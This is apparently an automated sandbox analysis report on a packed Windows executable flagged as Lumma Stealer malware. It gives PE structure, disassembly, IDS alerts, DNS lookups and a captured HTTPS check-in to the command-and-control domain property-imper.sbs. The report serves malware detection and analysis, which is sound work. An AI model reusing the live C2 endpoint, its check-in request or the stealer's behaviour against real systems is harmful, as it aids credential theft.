                            SHA512:de86a4bfac2f16dbe2438ad602f78ab7e852371ea60f7aff10aec8a970826286ce7b45d5c7584c7b7321ef7cf26c5c3aa13c23ff77191980be6f01d9e3b3af7d
                            SSDEEP:49152:7cf+g1IYS6iCnhLt6qx1Ol4fs/ZJuzvfNGE:743RQghLsqx1ATBQzH0
                            TLSH:E295335F9072B5F5E09DBB3243BB0F12777058C5C9150530187BA22E26EAEFC65A4A8F
                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...Q<?g..............................J...........@...........................J...........@.................................\...p..

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x8a9000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x673F3C51 [Thu Nov 21 13:57:37 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:0
                            File Version Major:6
                            File Version Minor:0
                            Subsystem Version Major:6
                            Subsystem Version Minor:0
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F5955213F3Ah
                            js 00007F5955213F52h
                            add byte ptr [eax], al
                            jmp 00007F5955215F35h
                            add byte ptr [edi], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+0Ah], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            pop es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edi], cl
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5805c0x70.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x570000x2b0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x581f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x560000x26200f6ff05c6d85820ff488579a0b1c78636False0.999327612704918DOS executable (COM)7.982670548763517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x570000x2b00x200bcc8dbd8db92e4c82287c0d20e6869c4False0.794921875data6.061190813406316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x580000x10000x200c92ced077364b300efd06b14c70a61dcFalse0.15625data1.1194718105633323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x590000x2ae0000x200abd319d9e752978811803a03d6bb8602unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            euxtkkub0x3070000x1a10000x1a0c003fe9fe7829b3edb0d18a69967f7471c8False0.9940000281193762TeX packed font data (\305\027p\300\332\317q\230\305\227\251qK)7.953806103846816IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ttmnjqdd0x4a80000x10000x400420113b878fcd4ce16e75cf9231f55e3False0.791015625data6.141580074552435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x4a90000x30000x22005a6d08ccd57d47d3a90737add7216340False0.06916360294117647DOS executable (COM)0.8818299280738513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x4a78b00x256ASCII text, with CRLF line terminators0.5100334448160535

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-24T20:01:19.775771+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849704104.21.33.116443TCP
                            2024-11-24T20:01:20.801399+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849704104.21.33.116443TCP
                            2024-11-24T20:01:20.801399+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849704104.21.33.116443TCP
                            2024-11-24T20:01:21.942911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849705104.21.33.116443TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 24, 2024 20:01:18.421456099 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:18.421504021 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:18.421582937 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:18.435941935 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:18.435967922 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:19.775696993 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:19.775770903 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:19.779731989 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:19.779748917 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:19.780026913 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:19.831017971 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:19.831077099 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:19.831299067 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:20.801440001 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:20.801543951 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:20.801678896 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:20.803800106 CET49704443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:20.803822041 CET44349704104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:20.850349903 CET49705443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:20.850409985 CET44349705104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:20.850589037 CET49705443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:20.850919008 CET49705443192.168.2.8104.21.33.116
                            Nov 24, 2024 20:01:20.850929976 CET44349705104.21.33.116192.168.2.8
                            Nov 24, 2024 20:01:21.942910910 CET49705443192.168.2.8104.21.33.116

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 24, 2024 20:01:18.098196030 CET6459053192.168.2.81.1.1.1
                            Nov 24, 2024 20:01:18.367687941 CET53645901.1.1.1192.168.2.8

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Nov 24, 2024 20:01:18.098196030 CET192.168.2.81.1.1.10x9001Standard query (0)property-imper.sbsA (IP address)IN (0x0001)false

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 24, 2024 20:01:18.367687941 CET1.1.1.1192.168.2.80x9001No error (0)property-imper.sbs104.21.33.116A (IP address)IN (0x0001)false
                            Nov 24, 2024 20:01:18.367687941 CET1.1.1.1192.168.2.80x9001No error (0)property-imper.sbs172.67.162.84A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • property-imper.sbs

                            HTTPS Proxied Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.849704104.21.33.1164433360C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            2024-11-24 19:01:19 UTC265OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: property-imper.sbs
                            2024-11-24 19:01:19 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
                            2024-11-24 19:01:20 UTC1016INHTTP/1.1 200 OK
                            Date: Sun, 24 Nov 2024 19:01:20 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=9nfcb740fa6p0igi0e6e5nughs; expires=Thu, 20-Mar-2025 12:47:59 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nDIBuiNrg%2BWPha6y2N8j1BqJIq1T5BL71JdBwJd2OyjFC8TjlRVVrT%2B5GJZ4nzEKk2ZK1x7%2BoyX3qgQcw0UhLZmqKymFY3p7Ir7b8Yb5HBz32aM5PVX0L09C9vna9Yj%2FhhqgdG8%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8e7ba5a08b428c5d-EWR
                            alt-svc: h3=":443"; ma=86400
                            server-timing: cfL4;desc="?proto=TCP&rtt=1839&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=1571582&cwnd=207&unsent_bytes=0&cid=28b7dd8013a7f761&ts=1039&x=0"
                            2024-11-24 19:01:20 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                            Data Ascii: 2ok
                            2024-11-24 19:01:20 UTC5INData Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:14:01:16
                            Start date:24/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x2f0000
                            File size:1'878'528 bytes
                            MD5 hash:542CD6EF81CDD42518BA3BAF58EB90E6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:3.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:66.2%
                              Total number of Nodes:234
                              Total number of Limit Nodes:14
                              execution_graph 6848 2fe88f 6849 2fe88e 6848->6849 6849->6848 6851 2fe89c 6849->6851 6854 32df70 LdrInitializeThunk 6849->6854 6853 2fe948 6851->6853 6855 32df70 LdrInitializeThunk 6851->6855 6854->6851 6855->6853 7036 309130 7037 32b8e0 2 API calls 7036->7037 7038 309158 7037->7038 7067 30db30 7068 30db70 7067->7068 7071 2fb210 7068->7071 7074 2fb2a0 7071->7074 7072 32ded0 RtlAllocateHeap 7072->7074 7073 2fb2d6 7074->7072 7074->7073 7075 2fc32b 7076 32ded0 RtlAllocateHeap 7075->7076 7077 2fc338 7076->7077 6810 2fcf05 6811 2fcf20 6810->6811 6816 329030 6811->6816 6813 2fcf7a 6814 329030 5 API calls 6813->6814 6815 2fd3ca 6814->6815 6817 329090 6816->6817 6817->6817 6818 3291b1 SysAllocString 6817->6818 6821 32966a 6817->6821 6820 3291df 6818->6820 6819 32969c GetVolumeInformationW 6824 3296ba 6819->6824 6820->6821 6822 3291ea CoSetProxyBlanket 6820->6822 6821->6819 6822->6821 6825 32920a 6822->6825 6823 329658 SysFreeString SysFreeString 6823->6821 6824->6813 6825->6823 6829 2f89a0 6830 2f89af 6829->6830 6831 2f8cb3 ExitProcess 6830->6831 6832 2f8cae 6830->6832 6837 2fce80 CoInitializeEx 6830->6837 6838 32deb0 6832->6838 6841 32f460 6838->6841 6840 32deb5 FreeLibrary 6840->6831 6842 32f469 6841->6842 6842->6840 6770 311960 6771 3119d8 6770->6771 6776 309530 6771->6776 6773 311a84 6774 309530 LdrInitializeThunk 6773->6774 6775 311b29 6774->6775 6777 309560 6776->6777 6788 330480 6777->6788 6779 309756 6785 309783 6779->6785 6787 3096ca 6779->6787 6792 330880 6779->6792 6780 30974b 6798 3307b0 6780->6798 6781 330480 LdrInitializeThunk 6783 30962e 6781->6783 6783->6779 6783->6780 6783->6781 6783->6785 6783->6787 6785->6787 6802 32df70 LdrInitializeThunk 6785->6802 6787->6773 6787->6787 6790 3304a0 6788->6790 6789 3305be 6789->6783 6790->6789 6803 32df70 LdrInitializeThunk 6790->6803 6793 3308b0 6792->6793 6796 3308fe 6793->6796 6804 32df70 LdrInitializeThunk 6793->6804 6795 3309ae 6795->6785 6796->6795 6805 32df70 LdrInitializeThunk 6796->6805 6800 3307e0 6798->6800 6799 33082e 6799->6779 6800->6799 6806 32df70 LdrInitializeThunk 6800->6806 6802->6787 6803->6789 6804->6796 6805->6795 6806->6799 6807 32b7e0 6808 32b800 6807->6808 6808->6808 6809 32b83f RtlAllocateHeap 6808->6809 6856 32bce0 6857 32bd5a 6856->6857 6858 32bcf2 6856->6858 6858->6857 6861 32bd52 6858->6861 6864 32df70 LdrInitializeThunk 6858->6864 6860 32bede 6860->6857 6860->6860 6866 32df70 LdrInitializeThunk 6860->6866 6861->6860 6865 32df70 LdrInitializeThunk 6861->6865 6864->6861 6865->6860 6866->6857 7049 330a00 7051 330a30 7049->7051 7050 330b2e 7053 330a7e 7051->7053 7055 32df70 LdrInitializeThunk 7051->7055 7053->7050 7056 32df70 LdrInitializeThunk 7053->7056 7055->7053 7056->7050 7062 3302c0 7063 3302e0 7062->7063 7063->7063 7064 33041e 7063->7064 7066 32df70 LdrInitializeThunk 7063->7066 7066->7064 6867 2fe0d8 6868 2fe100 6867->6868 6868->6868 6869 2fe16e 6868->6869 6883 32df70 LdrInitializeThunk 6868->6883 6872 2fe22e 6869->6872 6884 32df70 LdrInitializeThunk 6869->6884 6885 315e90 6872->6885 6874 2fe29d 6893 316190 6874->6893 6876 2fe2bd 6903 317e20 6876->6903 6880 2fe2e6 6923 318c90 6880->6923 6882 2fe2ef 6883->6869 6884->6872 6886 315f30 6885->6886 6886->6886 6887 316020 6886->6887 6888 316026 6886->6888 6889 3160b5 6886->6889 6932 330f60 6886->6932 6887->6874 6888->6888 6926 311790 6888->6926 6889->6889 6892 311790 2 API calls 6889->6892 6892->6887 6894 31619e 6893->6894 6965 330b70 6894->6965 6896 316026 6900 311790 2 API calls 6896->6900 6897 330f60 2 API calls 6902 315fe0 6897->6902 6898 316020 6898->6876 6899 3160b5 6899->6899 6901 311790 2 API calls 6899->6901 6900->6899 6901->6898 6902->6896 6902->6897 6902->6898 6902->6899 6904 3180a0 6903->6904 6907 317e4c 6903->6907 6913 2fe2dd 6903->6913 6914 3180d7 6903->6914 6970 32ded0 6904->6970 6905 330f60 2 API calls 6905->6907 6907->6904 6907->6905 6907->6907 6908 330b70 LdrInitializeThunk 6907->6908 6907->6913 6907->6914 6908->6907 6909 330b70 LdrInitializeThunk 6909->6914 6912 32df70 LdrInitializeThunk 6912->6914 6915 318770 6913->6915 6914->6909 6914->6912 6914->6913 6974 330c80 6914->6974 6982 331580 6914->6982 6916 3187a0 6915->6916 6917 31882e 6916->6917 6994 32df70 LdrInitializeThunk 6916->6994 6918 32b7e0 RtlAllocateHeap 6917->6918 6922 31895e 6917->6922 6920 3188b1 6918->6920 6920->6922 6995 32df70 LdrInitializeThunk 6920->6995 6922->6880 6996 318cb0 6923->6996 6925 318c99 6925->6882 6931 3117a0 6926->6931 6927 31183e 6927->6889 6929 311861 6929->6927 6944 313d70 6929->6944 6931->6927 6931->6929 6940 330610 6931->6940 6934 330f90 6932->6934 6933 330fde 6935 32b7e0 RtlAllocateHeap 6933->6935 6939 3310ae 6933->6939 6934->6933 6963 32df70 LdrInitializeThunk 6934->6963 6937 33101f 6935->6937 6937->6939 6964 32df70 LdrInitializeThunk 6937->6964 6939->6886 6939->6939 6942 330630 6940->6942 6941 33075e 6941->6929 6942->6941 6956 32df70 LdrInitializeThunk 6942->6956 6945 330480 LdrInitializeThunk 6944->6945 6947 313db0 6945->6947 6946 3144c3 6946->6927 6947->6946 6957 32b7e0 6947->6957 6950 313dee 6954 313e7c 6950->6954 6960 32df70 LdrInitializeThunk 6950->6960 6951 32b7e0 RtlAllocateHeap 6951->6954 6952 314427 6952->6946 6962 32df70 LdrInitializeThunk 6952->6962 6954->6951 6954->6952 6961 32df70 LdrInitializeThunk 6954->6961 6956->6941 6958 32b800 6957->6958 6958->6958 6959 32b83f RtlAllocateHeap 6958->6959 6959->6950 6960->6950 6961->6954 6962->6952 6963->6933 6964->6939 6966 330b90 6965->6966 6966->6966 6967 330c4f 6966->6967 6969 32df70 LdrInitializeThunk 6966->6969 6967->6902 6969->6967 6971 32df3e 6970->6971 6973 32deea 6970->6973 6972 32b7e0 RtlAllocateHeap 6971->6972 6972->6973 6973->6914 6975 330cb0 6974->6975 6976 330cfe 6975->6976 6990 32df70 LdrInitializeThunk 6975->6990 6978 32b7e0 RtlAllocateHeap 6976->6978 6980 330e0f 6976->6980 6979 330d8b 6978->6979 6979->6980 6991 32df70 LdrInitializeThunk 6979->6991 6980->6914 6983 331591 6982->6983 6984 33163e 6983->6984 6992 32df70 LdrInitializeThunk 6983->6992 6986 32b7e0 RtlAllocateHeap 6984->6986 6989 3317de 6984->6989 6987 3316ae 6986->6987 6987->6989 6993 32df70 LdrInitializeThunk 6987->6993 6989->6914 6990->6976 6991->6980 6992->6984 6993->6989 6994->6917 6995->6922 6997 318d10 6996->6997 6997->6997 7006 32b8e0 6997->7006 6999 318d6d 6999->6925 7001 318d45 7001->6999 7004 318e66 7001->7004 7014 32bb20 7001->7014 7018 32c040 7001->7018 7005 318ece 7004->7005 7026 32bfa0 7004->7026 7005->6925 7007 32b900 7006->7007 7008 32b93e 7007->7008 7030 32df70 LdrInitializeThunk 7007->7030 7009 32b7e0 RtlAllocateHeap 7008->7009 7013 32ba1f 7008->7013 7011 32b9c5 7009->7011 7011->7013 7031 32df70 LdrInitializeThunk 7011->7031 7013->7001 7015 32bbce 7014->7015 7016 32bb31 7014->7016 7015->7001 7016->7015 7032 32df70 LdrInitializeThunk 7016->7032 7019 32c090 7018->7019 7021 32c0d8 7019->7021 7033 32df70 LdrInitializeThunk 7019->7033 7020 32c73e 7020->7001 7021->7020 7023 32c6cf 7021->7023 7025 32df70 LdrInitializeThunk 7021->7025 7023->7020 7034 32df70 LdrInitializeThunk 7023->7034 7025->7021 7027 32bfc0 7026->7027 7029 32c00e 7027->7029 7035 32df70 LdrInitializeThunk 7027->7035 7029->7004 7030->7008 7031->7013 7032->7015 7033->7021 7034->7020 7035->7029 6826 2fceb3 CoInitializeSecurity 6843 2fdc33 6845 2fdcd0 6843->6845 6844 2fdd4e 6845->6844 6847 32df70 LdrInitializeThunk 6845->6847 6847->6844 6827 2fd7d2 CoUninitialize 6828 2fd7da 6827->6828 7057 2fdef2 7058 2fdf20 7057->7058 7058->7058 7059 2fdf9e 7058->7059 7061 32df70 LdrInitializeThunk 7058->7061 7061->7059 7039 2fe970 7040 2fe8b8 7039->7040 7042 2fe948 7040->7042 7043 32df70 LdrInitializeThunk 7040->7043 7042->7042 7043->7042

                              Executed Functions

                              Function 00329030 Relevance: 19.9, APIs: 5, Strings: 6, Instructions: 629memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 329030-329089 1 329090-3290c6 0->1 1->1 2 3290c8-3290e4 1->2 4 3290f1-32913f 2->4 5 3290e6 2->5 7 329145-329177 4->7 8 32968c-3296b8 call 32f9a0 GetVolumeInformationW 4->8 5->4 9 329180-3291af 7->9 13 3296ba 8->13 14 3296bc-3296df call 310650 8->14 9->9 11 3291b1-3291e4 SysAllocString 9->11 18 329674-329688 11->18 19 3291ea-329204 CoSetProxyBlanket 11->19 13->14 20 3296e0-3296e8 14->20 18->8 21 32966a-329670 19->21 22 32920a-329225 19->22 20->20 23 3296ea-3296ec 20->23 21->18 25 329230-329262 22->25 26 3296fe-32972d call 310650 23->26 27 3296ee-3296fb call 2f8330 23->27 25->25 28 329264-3292df 25->28 35 329730-329738 26->35 27->26 36 3292e0-32930b 28->36 35->35 37 32973a-32973c 35->37 36->36 38 32930d-32933d 36->38 39 32974e-32977d call 310650 37->39 40 32973e-32974b call 2f8330 37->40 49 329343-329365 38->49 50 329658-329668 SysFreeString * 2 38->50 46 329780-329788 39->46 40->39 46->46 48 32978a-32978c 46->48 51 32979e-3297cb call 310650 48->51 52 32978e-32979b call 2f8330 48->52 57 32964b-329655 49->57 58 32936b-32936e 49->58 50->21 61 3297d0-3297d8 51->61 52->51 57->50 58->57 60 329374-329379 58->60 60->57 63 32937f-3293cf 60->63 61->61 64 3297da-3297dc 61->64 69 3293d0-329416 63->69 65 3297ee-3297f5 64->65 66 3297de-3297eb call 2f8330 64->66 66->65 69->69 71 329418-32942d 69->71 72 329431-329433 71->72 73 329636-329647 72->73 74 329439-32943f 72->74 73->57 74->73 75 329445-329452 74->75 76 329454-329459 75->76 77 32948d 75->77 79 32946c-329470 76->79 80 32948f-3294b7 call 2f82b0 77->80 81 329472-32947b 79->81 82 329460 79->82 90 3295e8-3295f9 80->90 91 3294bd-3294cb 80->91 86 329482-329486 81->86 87 32947d-329480 81->87 85 329461-32946a 82->85 85->79 85->80 86->85 89 329488-32948b 86->89 87->85 89->85 92 329600-32960c 90->92 93 3295fb 90->93 91->90 94 3294d1-3294d5 91->94 96 329613-329633 call 2f82e0 call 2f82c0 92->96 97 32960e 92->97 93->92 95 3294e0-3294ea 94->95 98 329500-329506 95->98 99 3294ec-3294f1 95->99 96->73 97->96 102 329525-329533 98->102 103 329508-32950b 98->103 101 329590-329596 99->101 109 329598-32959e 101->109 106 329535-329538 102->106 107 3295aa-3295b3 102->107 103->102 105 32950d-329523 103->105 105->101 106->107 110 32953a-329581 106->110 113 3295b5-3295b7 107->113 114 3295b9-3295bc 107->114 109->90 112 3295a0-3295a2 109->112 110->101 112->95 115 3295a8 112->115 113->109 116 3295e4-3295e6 114->116 117 3295be-3295e2 114->117 115->90 116->101 117->101
                              APIs
                              • SysAllocString.OLEAUT32(13C511C2), ref: 003291B6
                              • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003291FC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1495792287.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                              • Associated: 00000000.00000002.1495775519.00000000002F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495792287.0000000000335000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495845211.0000000000347000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.0000000000349000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000004D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1495863381.00000000005F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496138770.00000000005F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496262731.0000000000798000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1496279628.0000000000799000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_2f0000_file.jbxd
                              Similarity
                              • API ID: AllocBlanketProxyString
                              • String ID: =3$E!q#$E!q#$Lgfe$\$IK
                              • API String ID: 900851650-3206278330
                              • Opcode ID: a441557e4afccff7a63d54f56e123ef6c3353bb5ca9216f47607e4644e19c6f8
                              • Instruction ID: ad7d7ce8e89c810ea8082668df98b09bd17ec3b860fb4bcccbc47106e8f6f970
                              • Opcode Fuzzy Hash: a441557e4afccff7a63d54f56e123ef6c3353bb5ca9216f47607e4644e19c6f8
                              • Instruction Fuzzy Hash: 8D226371A083209FE325CF20DC81B6BBBEAEF85354F158A1DF5859B281D774E905CB92
                              Function 002FCF05 Relevance: 18.1, Strings: 14, Instructions: 574COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
